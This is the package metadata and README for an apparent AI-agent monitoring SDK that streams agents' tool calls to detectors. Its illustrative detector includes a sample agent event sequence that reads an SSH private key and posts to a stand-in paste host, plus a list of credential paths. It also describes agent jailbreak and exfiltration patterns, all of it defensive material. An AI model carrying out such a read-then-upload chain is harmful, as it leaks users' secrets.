Metadata-Version: 2.4
Name: shieldpi
Version: 0.2.0
Summary: Runtime EDR for AI agents — zero-code-change monitoring for LangChain, LangGraph, OpenAI Assistants, and the Anthropic SDK
Author-email: ShieldPi <support@shieldpi.io>
License: Apache-2.0
Project-URL: Homepage, https://shieldpi.io
Project-URL: Documentation, https://docs.shieldpi.io/sdks/python
Project-URL: Repository, https://github.com/ShieldPi1/shieldpi-watchtower
Keywords: llm,security,agents,monitoring,ai-security
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: Apache Software License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Requires-Python: >=3.9
Description-Content-Type: text/markdown
Requires-Dist: httpx>=0.24.0
Provides-Extra: langchain
Requires-Dist: langchain-core>=0.1.0; extra == "langchain"
Requires-Dist: langchain>=0.1.0; extra == "langchain"
Provides-Extra: langgraph
Requires-Dist: langgraph>=0.2.0; extra == "langgraph"
Provides-Extra: openai
Requires-Dist: openai>=1.40.0; extra == "openai"
Provides-Extra: anthropic
Requires-Dist: anthropic>=0.25.0; extra == "anthropic"
Provides-Extra: all
Requires-Dist: langchain-core>=0.1.0; extra == "all"
Requires-Dist: langchain>=0.1.0; extra == "all"
Requires-Dist: langgraph>=0.2.0; extra == "all"
Requires-Dist: openai>=1.40.0; extra == "all"
Requires-Dist: anthropic>=0.25.0; extra == "all"
Provides-Extra: dev
Requires-Dist: pytest>=7; extra == "dev"
Requires-Dist: pytest-asyncio>=0.21; extra == "dev"

# ShieldPi — Runtime EDR for AI Agents

[![PyPI](https://img.shields.io/pypi/v/shieldpi.svg)](https://pypi.org/project/shieldpi/)
[![Python](https://img.shields.io/pypi/pyversions/shieldpi.svg)](https://pypi.org/project/shieldpi/)
[![License](https://img.shields.io/pypi/l/shieldpi.svg)](https://github.com/ShieldPi1/shieldpi-watchtower)

Zero-code-change monitoring for AI agents. Every tool call, LLM call, file read, and outbound request your agent makes streams to ShieldPi's detectors in real time — the same way EDR agents stream endpoint events to a SIEM.

## The 60-second setup

```bash
pip install "shieldpi[all]"
export SHIELDPI_SDK_KEY=shpi_live_...   # get one at https://shieldpi.io/dashboard
```

```python
# Add one import at the top of your agent process:
import shieldpi.auto

# Use LangChain / LangGraph / OpenAI Assistants / Anthropic SDK normally.
from langchain.agents import AgentExecutor
agent = AgentExecutor(...)
agent.invoke({"input": "..."})   # every tool call + LLM call is captured
```

That's it. Open https://shieldpi.io/dashboard/agent-monitor to see the live event stream and any alerts the detectors fire.

## What gets captured

| Agent action | What ShieldPi sees | Detector that scores it |
|--------------|--------------------|-------------------------|
| User sends a message | `user_message` event | `pattern_match` scans for jailbreak strings |
| Agent calls a tool | `tool_call` event with args | `analyzer` categorizes (destructive / exfil / credential_access) |
| Agent reads a file | `tool_call` args with `path` | `pattern_match` catches path traversal |
| Agent makes HTTP request | `tool_call` with URL | `trajectory` catches `read→exfil` kill chains |
| Agent writes to memory | `memory_write` event | `memory_integrity` detects tampering |
| Agent responds to user | `final_response` event | `response_leak_scanner` checks for leaked secrets |

Six detectors run in parallel on every event: **pattern_match**, **trajectory**, **analyzer**, **memory_correlation**, **memory_integrity**, **response_leak_scanner**.
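As an added illustration (not ShieldPi's own code; the detector internals are not documented here), the block below models the `trajectory` row of the table: a sequence-level check over a constructed stream of `tool_call` events that flags a file read followed, within a short window, by an outbound request to an untrusted host. The event field names, the host allowlist and the sensitive-path hints are assumptions.

```python
from urllib.parse import urlparse

# Constructed sample event stream. Field names are assumptions, not the SDK's wire format.
SAMPLE_EVENTS = [
    {"type": "user_message", "text": "Summarize my notes"},
    {"type": "tool_call", "name": "read_file", "args": {"path": "/home/u/notes.txt"}},
    {"type": "tool_call", "name": "read_file", "args": {"path": "/home/u/.ssh/id_rsa"}},
    {"type": "tool_call", "name": "http_request",
     "args": {"url": "https://paste.example.net/upload", "method": "POST"}},
    {"type": "final_response", "text": "Done."},
]

# Hosts the agent is expected to talk to; anything else is a possible exfil sink (assumed config).
TRUSTED_HOSTS = {"api.openai.com", "api.anthropic.com"}
SENSITIVE_PATH_HINTS = (".ssh/", ".env", ".aws/", "credentials")


def classify(event):
    """Coarse category for one event: 'read', 'exfil', or None for everything else."""
    if event.get("type") != "tool_call":
        return None
    args = event.get("args", {})
    if "path" in args:
        return "read"
    url = args.get("url")
    if url and (urlparse(url).hostname or "") not in TRUSTED_HOSTS:
        return "exfil"
    return None


def detect_read_exfil(events, window=5):
    """Alert on an untrusted outbound request that follows a file read within `window` events.

    Severity is 'high' when any of the preceding reads touched a credential-like path.
    """
    alerts, reads = [], []  # reads: (event index, path) of every read seen so far
    for i, ev in enumerate(events):
        cat = classify(ev)
        if cat == "read":
            reads.append((i, ev["args"]["path"]))
        elif cat == "exfil":
            recent = [p for j, p in reads if i - j <= window]
            if recent:
                sensitive = any(h in p for p in recent for h in SENSITIVE_PATH_HINTS)
                alerts.append({"index": i, "chain": "read->exfil", "url": ev["args"]["url"],
                               "reads": recent, "severity": "high" if sensitive else "medium"})
    return alerts
```

On the sample stream this yields one `read->exfil` alert at event index 3, rated `high` because one of the reads was `~/.ssh/id_rsa`; the same request to an allowlisted host produces no alert.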

## Supported frameworks

| Framework | Auto-patch | Manual handler | Optional dep |
|-----------|------------|----------------|-------------|
| LangChain (AgentExecutor) | ✅ | ✅ | `pip install shieldpi[langchain]` |
| LangChain (LCEL tools) | ✅ (BaseTool hook) | ✅ | `pip install shieldpi[langchain]` |
| LangGraph | ✅ | ✅ | `pip install shieldpi[langgraph]` |
| OpenAI Assistants API | ✅ | — | `pip install shieldpi[openai]` |
| OpenAI Chat Completions w/ tools | ✅ | — | `pip install shieldpi[openai]` |
| Anthropic SDK (tool use) | ✅ | ✅ | `pip install shieldpi[anthropic]` |
| Custom agents (no framework) | — | ✅ | base install |

## Explicit configuration (optional)

If you want to override env-var defaults:

```python
import shieldpi.auto

shieldpi.auto.configure(
    sdk_key="shpi_live_...",           # or SHIELDPI_SDK_KEY env
    agent_name="invoice-bot",           # or SHIELDPI_AGENT_NAME env
    stated_goal="help users file invoices",
    frameworks=["langchain", "anthropic"],  # or SHIELDPI_AUTO_INSTRUMENT=langchain,anthropic
)
```

Environment variables:

| Variable | Purpose |
|----------|---------|
| `SHIELDPI_SDK_KEY` | Your SDK key (starts with `shpi_live_`). **Required.** |
| `SHIELDPI_BASE_URL` | Override the API base URL (defaults to production). |
| `SHIELDPI_AGENT_NAME` | Logical name for this agent. Default: `unnamed-agent`. |
| `SHIELDPI_AGENT_GOAL` | Stated goal (helps detectors flag off-goal behavior). |
| `SHIELDPI_AUTO_INSTRUMENT` | Comma-separated framework allowlist. Default: all installed. |

## Manual integration

For custom agents or full control:

```python
from shieldpi import Monitor

monitor = Monitor(sdk_key="shpi_live_...")
with monitor.start_session(
    agent_name="invoice-bot",
    stated_goal="help users file invoices",
) as session:
    session.log_user_message("How do I file a Q1 invoice?")
    session.log_tool_call("search_docs", {"query": "Q1 invoice filing"})
    session.log_tool_result("search_docs", {"results": [...]})
    session.log_final_response("Here's how to file a Q1 invoice...")
```

### LangChain (manual)

```python
from shieldpi import Monitor
from shieldpi.hooks.langchain import ShieldPiCallbackHandler

monitor = Monitor(sdk_key="shpi_live_...")
handler = ShieldPiCallbackHandler(monitor, agent_name="my-agent")
agent.invoke({"input": "..."}, config={"callbacks": [handler]})
```

### Anthropic SDK (manual)

```python
from anthropic import Anthropic
from shieldpi import Monitor
from shieldpi.hooks.anthropic import monitored_tool_use

anth = Anthropic()
monitor = Monitor(sdk_key="shpi_live_...")

with monitored_tool_use(monitor, agent_name="invoice-bot") as session:
    session.log_user_message("Help me file an invoice")
    response = anth.messages.create(
        model="claude-opus-4-20250514",
        messages=[{"role": "user", "content": "Help me file an invoice"}],
        tools=[...],
    )
    session.observe_anthropic_response(response)
```

## Safety guarantees

The SDK is built to never crash your agent:

- Every HTTP call is fire-and-forget (background worker, bounded queue).
- Monitoring failures are logged at WARNING level; they never raise to your agent.
- If `SHIELDPI_SDK_KEY` is missing, `import shieldpi.auto` logs once and does nothing.
- All patches are idempotent — double-import won't double-wrap.
- Patches gracefully no-op when the target framework isn't installed.
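The following is an added sketch (not the SDK's implementation) of two of the guarantees above: a bounded fire-and-forget queue that drops and logs a WARNING instead of blocking or raising, and a marker-based monkeypatch that refuses to wrap a method twice. Class and attribute names are assumptions.

```python
import functools
import logging
import queue

log = logging.getLogger("shieldpi.example")  # assumed logger name
PATCH_MARK = "_shieldpi_patched"               # assumed marker attribute


class BoundedEmitter:
    """Holds events for a background sender; the caller never blocks and never sees an error."""

    def __init__(self, maxsize=1000):
        self._q = queue.Queue(maxsize=maxsize)
        self.dropped = 0

    def emit(self, event):
        try:
            self._q.put_nowait(event)
            return True
        except queue.Full:
            self.dropped += 1  # shed load rather than stall the agent
            log.warning("shieldpi: event queue full, dropping %s", event.get("type"))
            return False

    def drain(self, send):
        """Worker side: deliver queued events, swallowing sender failures. Returns count sent."""
        sent = 0
        while not self._q.empty():
            ev = self._q.get_nowait()
            try:
                send(ev)
                sent += 1
            except Exception as exc:  # monitoring failures must not propagate
                log.warning("shieldpi: send failed: %s", exc)
        return sent


def patch_method(cls, name, emitter):
    """Wrap cls.<name> so each call emits a tool_call event; re-applying is a no-op."""
    original = getattr(cls, name)
    if getattr(original, PATCH_MARK, False):
        return False  # already wrapped: idempotent

    @functools.wraps(original)
    def wrapper(self, *args, **kwargs):
        emitter.emit({"type": "tool_call", "name": name, "args": kwargs})
        return original(self, *args, **kwargs)

    setattr(wrapper, PATCH_MARK, True)
    setattr(cls, name, wrapper)
    return True


class DemoTool:  # constructed stand-in for a framework tool class
    def run(self, **kwargs):
        return "ok"
```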

## What's new in 0.2.0

- **`shieldpi.auto`** — one-line zero-code-change monitoring for LangChain, LangGraph, OpenAI, and Anthropic.
- **LangGraph support** — first-class patching of `Pregel.invoke/ainvoke/stream/astream`.
- **OpenAI Assistants support** — new patch for `client.beta.threads.runs.create_and_poll` and Chat Completions with tools.
- **Import hook** — frameworks imported AFTER `shieldpi.auto` are still patched.
- **Idempotent patches** — safe to re-import or reconfigure at runtime.

## Links

- Dashboard — https://shieldpi.io/dashboard/agent-monitor
- Docs — https://shieldpi.io/docs/live-agent-monitor
- Scanner package — [`shieldpi-mcp`](https://pypi.org/project/shieldpi-mcp/) (MCP server for Claude Desktop / Cursor / Continue)

## License

Apache-2.0
